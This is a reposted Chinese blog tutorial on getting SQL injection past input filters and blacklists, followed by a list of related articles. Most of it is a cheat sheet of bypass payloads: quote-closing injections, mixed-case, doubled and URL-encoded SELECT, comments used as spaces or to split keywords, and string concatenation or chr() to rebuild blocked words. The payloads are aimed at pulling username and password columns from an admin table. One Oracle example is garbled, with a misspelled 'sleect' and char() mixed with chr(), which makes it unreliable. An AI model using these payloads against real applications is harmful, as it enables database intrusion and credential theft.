sql注入——避开过滤

简介:

有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。

唱出会删除或者净化一些字符,或者阻止常用的sql关键词。

我们通常有以下几种技巧,去避开这些过滤。

1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。

A,如果注入一个数字数据字段,就不需要使用单引号。

B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。

比如, ?id=1′ 这里存在注入,过滤了注释符合,我们可以输入 ?id=1′ or ‘a’='a

目的其实很简单,就是把后面的单引号给闭合掉。

C,在一个MSSQL注入中注入批量查询的时候,不必使用分号分隔符。

只要纠正所有批量查询的语法,无论你是否使用分号,查询的解析器依然能正确的去解释它们的。

2,避免使用简单确认

一些输入确认机制使用一个简单的黑名单,组织或删除任何出现在这个名单中的数据,比如防注入程序。

这一般要看这个机制是否做的足够的好了,黑名单是否足够能确保安全。如果只是简单的黑名单,那也有机会突破的。

A,如果select关键词被阻止或删除

我们可以输入:

SeLeCt       注意大小写

selselectect    还记得ewebeditor是怎么过滤asp的么?

%53%45%4c%45%43%54                        URL编码

%2553%2545%254c%2545%2543%2554    对上面的每个%后加了一个25

3,使用SQL注释符

A,使用注释来冒充注入的数据中的空格。

select/*yesu*/username,password/*yesu*/from/*yesu*/admin

/*yesu*/来冒充空格

B,使用注释来避开某些注入的确认过滤。

SEL/*yesu*/ECT username,password fr/*yesu*/om admin

4,处理被阻止的字符串

比如,程序阻止了admin,因为怕攻击者注入admin表单中的数据。

我们可以这样

A,oracle数据库: ‘adm’||’in’

B,MSSQL数据库: ‘adm’+'in’

C,MYSQL数据库: concat (‘adm’,'in’)

D,oracle中如果单引号被阻止了,还可以用chr函数

sleect password from admin where username = char(97) || chr(100) || chr(109) || chr(105) || chr(110)

还有几种方法,就不讲解了,打字好累的


















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/394299,如需转载请自行联系原作者

相关文章
|
1天前
|
SQL 安全
jeecg-boot sql注入漏洞解决
jeecg-boot sql注入漏洞解决
|
3天前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
12 0
|
5天前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 参数详解
SQL 注入神器:SQLMap 参数详解
|
11天前
|
SQL 存储 Java
如何避免SQL注入?
【4月更文挑战第30天】如何避免SQL注入?
23 0
|
11天前
|
SQL 安全 PHP
【PHP 开发专栏】PHP 防止 SQL 注入的方
【4月更文挑战第30天】本文介绍了PHP防止SQL注入的策略,包括理解SQL注入的原理和危害,如数据泄露和系统控制。推荐使用参数化查询(如PDO扩展)、过滤和验证用户输入,以及选择安全的框架和库(如Laravel)。此外,强调了保持警惕、定期更新维护和开发人员安全培训的重要性,以确保应用安全。
|
11天前
|
SQL 存储 安全
|
11天前
|
SQL Oracle 关系型数据库
常见 SQL 注入绕过方法
常见 SQL 注入绕过方法
|
11天前
|
SQL Oracle 关系型数据库
利用 SQL 注入提取数据方法总结
利用 SQL 注入提取数据方法总结
|
11天前
|
SQL 关系型数据库 MySQL
利用 SQL 注入识别数据库方法总结
利用 SQL 注入识别数据库方法总结
|
11天前
|
SQL Oracle Java
SQL 注入神器:jSQL Injection 保姆级教程
SQL 注入神器:jSQL Injection 保姆级教程